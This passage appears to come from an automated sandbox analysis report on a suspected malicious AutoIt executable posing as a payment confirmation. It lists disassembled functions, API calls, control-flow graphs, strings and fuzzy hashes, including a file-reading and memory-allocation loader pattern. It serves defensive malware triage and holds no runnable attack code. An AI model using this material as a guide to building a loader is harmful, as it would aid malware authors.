                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                          • String ID: >>>AUTOIT SCRIPT<<<
                                          • API String ID: 2955681530-2806939583
                                          • Opcode ID: eb8b5d7b3a6de602aafe9c250d0521c7e656b3e3e72f22508b1c8bc36bce86ff
                                          • Instruction ID: bcf7ee0e7c02f2b5aff5588c997f4903b7057776e6c26a460eb8804f9d3abec1
                                          • Opcode Fuzzy Hash: eb8b5d7b3a6de602aafe9c250d0521c7e656b3e3e72f22508b1c8bc36bce86ff
                                          • Instruction Fuzzy Hash: 3991B371104706AFCB25EB58C854FABB3E8FF94318F04485DF58997291EB34EA48CB96
                                          Function 012E4257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,00000000,00000001,00000000), ref: 012E428C
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01301BC7: __wcsicmp_l.LIBCMT ref: 01301C50
                                          • _wcscpy.LIBCMT ref: 012E43C0
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0135214E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Payment confirmation 20240911.exe$CMDLINE$CMDLINERAW
                                          • API String ID: 861526374-2635015396
                                          • Opcode ID: 673990977375ef42e2edecc71001dd74dd499040a51db12c4bc9f3c53e944e65
                                          • Instruction ID: 387a4733ec191b56113c5eeccd10442949612613ff475fcda939f2b909c10cfa
                                          • Opcode Fuzzy Hash: 673990977375ef42e2edecc71001dd74dd499040a51db12c4bc9f3c53e944e65
                                          • Instruction Fuzzy Hash: 1181727692014AAACB15EBE4D958DFFB7FCEF25354F900019D541B7180EB70AB05CBA1
                                          Function 0132C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0132C6A0: __time64.LIBCMT ref: 0132C6AA
                                            • Part of subcall function 012E41A7: _fseek.LIBCMT ref: 012E41BF
                                          • __wsplitpath.LIBCMT ref: 0132C96F
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcscpy.LIBCMT ref: 0132C982
                                          • _wcscat.LIBCMT ref: 0132C995
                                          • __wsplitpath.LIBCMT ref: 0132C9BA
                                          • _wcscat.LIBCMT ref: 0132C9D0
                                          • _wcscat.LIBCMT ref: 0132C9E3
                                            • Part of subcall function 0132C6E4: _memmove.LIBCMT ref: 0132C71D
                                            • Part of subcall function 0132C6E4: _memmove.LIBCMT ref: 0132C72C
                                          • _wcscmp.LIBCMT ref: 0132C92A
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF49
                                            • Part of subcall function 0132CE59: _wcscmp.LIBCMT ref: 0132CF5C
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0132CB8D
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0132CC24
                                          • CopyFileW.KERNEL32 ref: 0132CC3A
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0132CC4B
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0132CC5D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                          • String ID:
                                          • API String ID: 152968663-0
                                          • Opcode ID: b8935b988977260003014caee490069b4d837486cbf4a88eccc92fcd8da1f73a
                                          • Instruction ID: ca6052f34c31bfa31902a6fde03de174e2c901307ad7c60ac007b6d3b31795ca
                                          • Opcode Fuzzy Hash: b8935b988977260003014caee490069b4d837486cbf4a88eccc92fcd8da1f73a
                                          • Instruction Fuzzy Hash: 29C10EB1E00129AEDF11EF99CC84EEEB7BDEF59254F0040AAE609E7150D7709A84CF65
                                          Function 012FE975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 012FEA39
                                          • __wsplitpath.LIBCMT ref: 012FEA56
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcsncat.LIBCMT ref: 012FEA69
                                          • __makepath.LIBCMT ref: 012FEA85
                                            • Part of subcall function 01302BFF: __wmakepath_s.LIBCMT ref: 01302C13
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • _wcscpy.LIBCMT ref: 012FEABE
                                            • Part of subcall function 012FEB05: RegOpenKeyExW.KERNEL32 ref: 012FEB27
                                          • _wcscat.LIBCMT ref: 013532FC
                                          • _wcscat.LIBCMT ref: 01353334
                                          • _wcsncpy.LIBCMT ref: 01353370
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                          • String ID: Include$\
                                          • API String ID: 1213536620-3429789819
                                          • Opcode ID: 2b6c0ec4afb702444268d8f2e145f80a5c9db86b831b80ea7f678a82c3c71bbe
                                          • Instruction ID: c4c958c9e5a8e7f935e1785bdcb3f2bbe34bddbdb12f2550ca3fa7a0955fd1d8
                                          • Opcode Fuzzy Hash: 2b6c0ec4afb702444268d8f2e145f80a5c9db86b831b80ea7f678a82c3c71bbe
                                          • Instruction Fuzzy Hash: D55180B5404341ABC729EF59E894CA7B7ECFB5A304FC0492EF94583294EB709648CB66
                                          Function 012E29C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1088 12e29c2-12e29e2 1090 12e29e4-12e29e7 1088->1090 1091 12e2a42-12e2a44 1088->1091 1092 12e2a48 1090->1092 1093 12e29e9-12e29f0 1090->1093 1091->1090 1094 12e2a46 1091->1094 1098 12e2a4e-12e2a51 1092->1098 1099 1352307-1352335 call 12e322e call 12fec33 1092->1099 1095 12e2aac-12e2ab4 PostQuitMessage 1093->1095 1096 12e29f6-12e29fb 1093->1096 1097 12e2a2b-12e2a33 DefWindowProcW 1094->1097 1103 12e2a72-12e2a74 1095->1103 1101 135238f-13523a3 call 13257fb 1096->1101 1102 12e2a01-12e2a03 1096->1102 1104 12e2a39-12e2a3f 1097->1104 1105 12e2a76-12e2a9d SetTimer RegisterWindowMessageW 1098->1105 1106 12e2a53-12e2a54 1098->1106 1133 135233a-1352341 1099->1133 1101->1103 1127 13523a9 1101->1127 1108 12e2a09-12e2a0e 1102->1108 1109 12e2ab6-12e2ac5 call 12e1e58 1102->1109 1103->1104 1105->1103 1110 12e2a9f-12e2aaa CreatePopupMenu 1105->1110 1112 12e2a5a-12e2a6d KillTimer call 12e2b94 call 12e2ac7 1106->1112 1113 13522aa-13522ad 1106->1113 1116 1352374-135237b 1108->1116 1117 12e2a14-12e2a19 1108->1117 1109->1103 1110->1103 1112->1103 1120 13522e3-1352302 MoveWindow 1113->1120 1121 13522af-13522b1 1113->1121 1116->1097 1123 1352381-135238a call 131b31f 1116->1123 1125 12e2a1f-12e2a25 1117->1125 1126 135235f-135236f call 1325fdb 1117->1126 1120->1103 1129 13522b3-13522b6 1121->1129 1130 13522d2-13522de SetFocus 1121->1130 1123->1097 1125->1097 1125->1133 1126->1103 1127->1097 1129->1125 1134 13522bc-13522cd call 12e322e 1129->1134 1130->1103 1133->1097 1138 1352347-135235a call 12e2b94 call 12e3598 1133->1138 1134->1103 1138->1097
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 012E2A33
                                          • KillTimer.USER32 ref: 012E2A5D
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 012E2A80
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012E2A8B
                                          • CreatePopupMenu.USER32 ref: 012E2A9F
                                          • PostQuitMessage.USER32(00000000), ref: 012E2AAE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: c9c571db1903fa5ef8eb57c6ad6cc34c2c6e02146df9459c9b1a5becc4c5b1f6
                                          • Instruction ID: 469088ff92b3d04a47ec6a3006b4e75ebbcefcdb7f15d9d4a73cfe4bc26cc59d
                                          • Opcode Fuzzy Hash: c9c571db1903fa5ef8eb57c6ad6cc34c2c6e02146df9459c9b1a5becc4c5b1f6
                                          • Instruction Fuzzy Hash: AF410335274246EBEB35AF6CAC0DBBA3ADEFB24344FC44115FA0796295DAB09C408761
                                          Function 012E30A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32 ref: 012E30B0
                                          • LoadCursorW.USER32 ref: 012E30BF
                                          • LoadIconW.USER32 ref: 012E30D5
                                          • LoadIconW.USER32 ref: 012E30E7
                                          • LoadIconW.USER32 ref: 012E30F9
                                            • Part of subcall function 012E318A: LoadImageW.USER32 ref: 012E31AE
                                          • RegisterClassExW.USER32(?), ref: 012E3167
                                            • Part of subcall function 012E2F58: GetSysColorBrush.USER32 ref: 012E2F8B
                                            • Part of subcall function 012E2F58: RegisterClassExW.USER32(00000030), ref: 012E2FB5
                                            • Part of subcall function 012E2F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012E2FC6
                                            • Part of subcall function 012E2F58: InitCommonControlsEx.COMCTL32(?), ref: 012E2FE3
                                            • Part of subcall function 012E2F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 012E2FF3
                                            • Part of subcall function 012E2F58: LoadIconW.USER32 ref: 012E3009
                                            • Part of subcall function 012E2F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 012E3018
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 625b46e4f36c20a391650c01f6cd3784454e569e11d8a9a2dd39677783fd48f6
                                          • Instruction ID: 4aa2515f20903dd736b4a51289deed914b7f31e43829057f7f9897beeb8b3100
                                          • Opcode Fuzzy Hash: 625b46e4f36c20a391650c01f6cd3784454e569e11d8a9a2dd39677783fd48f6
                                          • Instruction Fuzzy Hash: 072180B4E44354AFDB60DFA9E849A9ABFFDFB48314F40812EE604A7294D3749500CF91
                                          Function 002625F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1152 2625f0-26269e call 260000 1155 2626a5-2626cb call 263500 CreateFileW 1152->1155 1158 2626d2-2626e2 1155->1158 1159 2626cd 1155->1159 1167 2626e4 1158->1167 1168 2626e9-262703 VirtualAlloc 1158->1168 1160 26281d-262821 1159->1160 1161 262863-262866 1160->1161 1162 262823-262827 1160->1162 1164 262869-262870 1161->1164 1165 262833-262837 1162->1165 1166 262829-26282c 1162->1166 1171 2628c5-2628da 1164->1171 1172 262872-26287d 1164->1172 1173 262847-26284b 1165->1173 1174 262839-262843 1165->1174 1166->1165 1167->1160 1169 262705 1168->1169 1170 26270a-262721 ReadFile 1168->1170 1169->1160 1175 262723 1170->1175 1176 262728-262768 VirtualAlloc 1170->1176 1179 2628dc-2628e7 VirtualFree 1171->1179 1180 2628ea-2628f2 1171->1180 1177 262881-26288d 1172->1177 1178 26287f 1172->1178 1181 26284d-262857 1173->1181 1182 26285b 1173->1182 1174->1173 1175->1160 1183 26276f-26278a call 263750 1176->1183 1184 26276a 1176->1184 1185 2628a1-2628ad 1177->1185 1186 26288f-26289f 1177->1186 1178->1171 1179->1180 1181->1182 1182->1161 1192 262795-26279f 1183->1192 1184->1160 1189 2628af-2628b8 1185->1189 1190 2628ba-2628c0 1185->1190 1188 2628c3 1186->1188 1188->1164 1189->1188 1190->1188 1193 2627d2-2627e6 call 263560 1192->1193 1194 2627a1-2627d0 call 263750 1192->1194 1199 2627ea-2627ee 1193->1199 1200 2627e8 1193->1200 1194->1192 1202 2627f0-2627f4 CloseHandle 1199->1202 1203 2627fa-2627fe 1199->1203 1200->1160 1202->1203 1204 262800-26280b VirtualFree 1203->1204 1205 26280e-262817 1203->1205 1204->1205 1205->1155 1205->1160
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 002626C1
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002628E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                          • Instruction ID: b494bed212ccf939bd2b4f1dd8bb7c2325b68f79adef0e7595fcb67310b222ac
                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                          • Instruction Fuzzy Hash: 43A12874E10209EBDB14CFA4C898BEEBBB5FF48304F208559E501BB280D7759A95CFA4
                                          Function 012FEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • RegOpenKeyExW.KERNEL32 ref: 012FEB27
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 01354B26
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 01354B65
                                          • RegCloseKey.ADVAPI32(?), ref: 01354B94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                          • API String ID: 1586453840-614718249
                                          • Opcode ID: 811cbe43e50dfad91de064a42ae4b747632c5d40d0e3f482ae94940c342a65e0
                                          • Instruction ID: b778576c24d36d01a54d773e3d913f0a995b6cf82ee766c048b48373fbad523b
                                          • Opcode Fuzzy Hash: 811cbe43e50dfad91de064a42ae4b747632c5d40d0e3f482ae94940c342a65e0
                                          • Instruction Fuzzy Hash: 49117F71A00109BEEB14ABA8CD85EFE77BCEF04748F504019F546E6190EAB09E41D760
                                          Function 012E2E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1288 12e2e9d-12e2f0d CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: aade15c385d3ef6d798f4f11977e2565515c8de731b37f2c1549b6a800805e77
                                          • Instruction ID: 185fdc0170eab3dfa2d71928049a6f33150e8a8aeefb7996e6a63d44eb504c8b
                                          • Opcode Fuzzy Hash: aade15c385d3ef6d798f4f11977e2565515c8de731b37f2c1549b6a800805e77
                                          • Instruction Fuzzy Hash: E3F054707802E07AE7309A536C4CE773E7DE7C6F24F41401FF90492194C1650845CB70
                                          Function 002623B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1289 2623b0-2624e9 call 260000 call 2622a0 CreateFileW 1296 2624f0-262500 1289->1296 1297 2624eb 1289->1297 1300 262507-262521 VirtualAlloc 1296->1300 1301 262502 1296->1301 1298 2625a0-2625a5 1297->1298 1302 262525-26253c ReadFile 1300->1302 1303 262523 1300->1303 1301->1298 1304 262540-26257a call 2622e0 call 2612a0 1302->1304 1305 26253e 1302->1305 1303->1298 1310 262596-26259e ExitProcess 1304->1310 1311 26257c-262591 call 262330 1304->1311 1305->1298 1310->1298 1311->1310
                                          APIs
                                            • Part of subcall function 002622A0: Sleep.KERNEL32(000001F4), ref: 002622B1
                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 002624DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350512103.0000000000260000.00000040.00001000.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_260000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: YMPN82YXG8K5FN4
                                          • API String ID: 2694422964-355732285
                                          • Opcode ID: 1b718d4410ffe313cc6461b8f19deb6cc1ab054c62be0e4bfe692aa4ebf1f919
                                          • Instruction ID: 212da55b2ac8952ecfc0d746a4308004cd228663a6f2e7cd70861b9b57a8a840
                                          • Opcode Fuzzy Hash: 1b718d4410ffe313cc6461b8f19deb6cc1ab054c62be0e4bfe692aa4ebf1f919
                                          • Instruction Fuzzy Hash: A0519230D14249EBEF15DBE4C855BEEBB79AF58300F004199E609BB2C0D7B91B49CB65
                                          Function 012E38E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0135454E
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • _memset.LIBCMT ref: 012E3965
                                          • _wcscpy.LIBCMT ref: 012E39B5
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 012E39C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: a9268b76e73dcc5889148b693ccf17eeabfa7fdc61c9d873ff544a06fff1af99
                                          • Instruction ID: a7eb63461e43244cc30e4d5d2d996e76d896ee918bfd7ed6bc2425092e3a1f22
                                          • Opcode Fuzzy Hash: a9268b76e73dcc5889148b693ccf17eeabfa7fdc61c9d873ff544a06fff1af99
                                          • Instruction Fuzzy Hash: 3531F471128342ABD731EB64CC48FEB77ECBF58315F80451EE28993190EB70A648CB92
                                          Function 012E3DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,012E34E2,?,00000001), ref: 012E3FCD
                                          • _free.LIBCMT ref: 01353C27
                                          • _free.LIBCMT ref: 01353C6E
                                            • Part of subcall function 012EBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,013A22E8,?,00000000,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?), ref: 012EBE8B
                                            • Part of subcall function 012EBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?,00000002), ref: 012EBEA7
                                            • Part of subcall function 012EBDF0: __wsplitpath.LIBCMT ref: 012EBF19
                                            • Part of subcall function 012EBDF0: _wcscpy.LIBCMT ref: 012EBF31
                                            • Part of subcall function 012EBDF0: _wcscat.LIBCMT ref: 012EBF46
                                            • Part of subcall function 012EBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 012EBF56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 1510338132-1757145024
                                          • Opcode ID: 7f33b3920ac550bcc11a5db465a87d178345db4138401c27d1c6d26d5c749a16
                                          • Instruction ID: 0687ac0a221d4d6ca09ed015182110dc41164f84087f25e17d7eae18764114e3
                                          • Opcode Fuzzy Hash: 7f33b3920ac550bcc11a5db465a87d178345db4138401c27d1c6d26d5c749a16
                                          • Instruction Fuzzy Hash: 6D91807191022AEFDF05EFA8CC94DFEB7B4BF18758F444469E816AB290EB349905CB50
                                          Function 0130413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • __getstream.LIBCMT ref: 0130418E
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 013041C9
                                          • __wopenfile.LIBCMT ref: 013041D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
